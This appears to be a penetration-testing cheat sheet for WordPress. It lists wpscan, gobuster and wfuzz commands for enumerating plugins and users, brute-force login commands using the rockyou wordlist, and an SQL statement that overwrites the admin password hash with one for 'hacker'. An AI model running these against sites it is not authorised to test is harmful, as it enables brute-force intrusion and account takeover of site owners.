Skip to content

Wordpress

Scan


General scan

wpscan --url $URL
wpscan --url $URL --api-token='xxxxxxxxxxxxxxxxxxx'

Enumeration


Enumeration directory

gobuster dir --url $IP --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Enumerate plugins
wpscan --url http://$URL -e ap --plugins-detection aggressive
wget https://plugins.svn.wordpress.org/ -O wp-plugins.html

cat wp-plugins.html | grep -Eo 'href="[a-zA-Z0-9./?=_%:-]*"' | sed "s/href=//" | tr -d '"' | tr -d "/" | sort -u > wp-plugins.txt

wfuzz -c -z file,wp-plugins.txt --hc 404  "$URL/wp-content/plugins/FUZZ/readme.txt"
Enumeration users
wpscan --url $URL --enumerate u
curl $URL/index.php/wp-json/wp/v2/users -s | jq '.[].slug' | sed 's\"\\g'
Password bruteforce
wpscan --url $URL --passwords /usr/share/wordlists/rockyou.txt

Other


Inject password 'hacker'

UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';
Bruteforce login
wpscan --url $URL -U user.txt -P /usr/share/wordlists/rockyou.txt
Search files that contain version
grep -R 5.9.2 /workspace/latest/source_code